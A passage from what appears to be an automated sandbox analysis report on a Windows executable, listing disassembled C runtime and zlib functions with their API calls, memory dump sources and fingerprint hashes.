                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 58520673A146A68BE794AF14D859B7E7BADFF44340F818139E64A87780DB3CE840CB50
                                                                                                                                                                                                                                      Function 00007FF70AEFD19C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3140674995-0
                                                                                                                                                                                                                                      • Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                                      • Instruction ID: fdc104fc572063648e3f76c845ccde831fa8fbc938e16f1b42218220352ab1db
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8311D73609A8186FB60AF60EC803EEA364FB84748F84443ADA4D47B95EF7CD548C720
                                                                                                                                                                                                                                      Function 00007FF70AF15C70 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF70AF15CB5
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AF15608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF70AF1561C
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AF0A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF70AF12D92,?,?,?,00007FF70AF12DCF,?,?,00000000,00007FF70AF13295,?,?,?,00007FF70AF131C7), ref: 00007FF70AF0A9CE
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AF0A9B8: GetLastError.KERNEL32(?,?,?,00007FF70AF12D92,?,?,?,00007FF70AF12DCF,?,?,00000000,00007FF70AF13295,?,?,?,00007FF70AF131C7), ref: 00007FF70AF0A9D8
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AF0A970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF70AF0A94F,?,?,?,?,?,00007FF70AF0A83A), ref: 00007FF70AF0A979
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AF0A970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF70AF0A94F,?,?,?,?,?,00007FF70AF0A83A), ref: 00007FF70AF0A99E
                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF70AF15CA4
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AF15668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF70AF1567C
                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF70AF15F1A
                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF70AF15F2B
                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF70AF15F3C
                                                                                                                                                                                                                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF70AF1617C), ref: 00007FF70AF15F63
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4070488512-0
                                                                                                                                                                                                                                      • Opcode ID: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                                                                                                                                                      • Instruction ID: 0fbee262e90e9278d75975231a5bc8bd2d88ab7ea718ebdcd4d121d47bd69b91
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1ED19A63E0825286FB20FF26DC415B9A661EF84798FC08176EA4D87786EF3CF4418760
                                                                                                                                                                                                                                      Function 00007FF70AF0A684 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1239891234-0
                                                                                                                                                                                                                                      • Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                                      • Instruction ID: 80f7fa2c9fa347ed8872a57be45972699fe5fa640826ec1bef6388f1fd996f7d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4314D33618B8186EB60AB25EC406AEB7A4FB88798F940135EA8D47B54EF3CD155CB10
                                                                                                                                                                                                                                      Function 00007FF70AF118E4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2227656907-0
                                                                                                                                                                                                                                      • Opcode ID: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                                                      • Instruction ID: 6bebf4c2e426c1b82415be9fd44164bcba8503f1684fb09b00d0baae400f1fa5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 12B19123B1869681FA61EB22DD405B9E2A1EF44BE4F844279EA9D47B85EF3CF441C314
                                                                                                                                                                                                                                      Function 00007FF70AF15EEC Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF70AF15F1A
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AF15668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF70AF1567C
                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF70AF15F2B
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AF15608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF70AF1561C
                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF70AF15F3C
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AF15638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF70AF1564C
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AF0A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF70AF12D92,?,?,?,00007FF70AF12DCF,?,?,00000000,00007FF70AF13295,?,?,?,00007FF70AF131C7), ref: 00007FF70AF0A9CE
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AF0A9B8: GetLastError.KERNEL32(?,?,?,00007FF70AF12D92,?,?,?,00007FF70AF12DCF,?,?,00000000,00007FF70AF13295,?,?,?,00007FF70AF131C7), ref: 00007FF70AF0A9D8
                                                                                                                                                                                                                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF70AF1617C), ref: 00007FF70AF15F63
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3458911817-0
                                                                                                                                                                                                                                      • Opcode ID: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                                                                                                                                                      • Instruction ID: cc5bba006f3810bbe9dbe8396a72f8f4cae0ef5cee69fd76735e82df9d8d1c49
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 79514C23A1864286F720FF25DD815A9E760BF88784FC491BAEA4D87796DF3CF4408760
                                                                                                                                                                                                                                      Function 00007FF70AEFD080 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                                                                                      • Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                                      • Instruction ID: 102d7a3294b779a1f9679992ff74748dd7ee708ebcbed372a55612fc00cac4fc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62111526B14B06CAFB00EB60EC552A973A4FB19758F840E31EA6D867A4DF7CE1598350
                                                                                                                                                                                                                                      Function 00007FF70AF13C80 Relevance: 4.8, APIs: 3, Instructions: 340COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy_s
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1502251526-0
                                                                                                                                                                                                                                      • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                      • Instruction ID: e8b96e30af1f513ff306eba93a2df213b7c7a66cf93f28148f6fc7502b16ad7f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A7C1E2B3A1868A87E724DF1AE444A6AF7A1FB94784F848234DB4A57744DB3DF805CB40
                                                                                                                                                                                                                                      Function 00007FF70AEFA4E4 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                                      • API String ID: 0-1127688429
                                                                                                                                                                                                                                      • Opcode ID: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
                                                                                                                                                                                                                                      • Instruction ID: f905bf86bb7fc2562f8da26a0b67a5b366a1ecbec21c196a917f33f86351ef21
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 94F17463A183D64AF795BF14C889B3ABBA9EF44780FC64578DA4D4B390CB38E541C750
                                                                                                                                                                                                                                      Function 00007FF70AF19798 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 15204871-0
                                                                                                                                                                                                                                      • Opcode ID: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
                                                                                                                                                                                                                                      • Instruction ID: b76cdd9d03158d683286fdc733a905c868561873bad91a369f4ca774fcb89b87
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D5B1BF73A04B898BEB19CF29C89236CBBE0FB44B48F548861DB5D837A4CB79E451C750
                                                                                                                                                                                                                                      Function 00007FF70AF03A14 Relevance: 2.8, Strings: 2, Instructions: 350COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: $
                                                                                                                                                                                                                                      • API String ID: 0-227171996
                                                                                                                                                                                                                                      • Opcode ID: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
                                                                                                                                                                                                                                      • Instruction ID: 7ab937d1cb919448a7d2eecc6c57d16b9c7e627f4900669ffbac0ac19e015c40
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AAE1E377A0864686FB68AF29C85093DB3A0FF45B48F954375DA4E8B694CF39F841C720
                                                                                                                                                                                                                                      Function 00007FF70AEFA34B Relevance: 2.7, Strings: 2, Instructions: 216COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                                      • API String ID: 0-900081337
                                                                                                                                                                                                                                      • Opcode ID: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
                                                                                                                                                                                                                                      • Instruction ID: b1e7d8cda83de1feee5b09753c552b6731fafe9d582a01e970f7be3de9df2ccf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F4917473A186878BF7A5BA14D889B3E7AA9FF44390FD54179DA4E47780CB38E540CB10
                                                                                                                                                                                                                                      Function 00007FF70AF0DF60 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: e+000$gfff
                                                                                                                                                                                                                                      • API String ID: 0-3030954782
                                                                                                                                                                                                                                      • Opcode ID: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
                                                                                                                                                                                                                                      • Instruction ID: cca673d6e63f780a9a6690895e13ee9542ef05d8661a8c257f6e7fb8e20ce0d1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 54515663B182C186F7249A35DC00B69EB91EB84B94F88D6B5CBA887AC5CF7DF0418710
                                                                                                                                                                                                                                      Function 00007FF70AF10938 Relevance: 2.0, APIs: 1, Instructions: 461COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
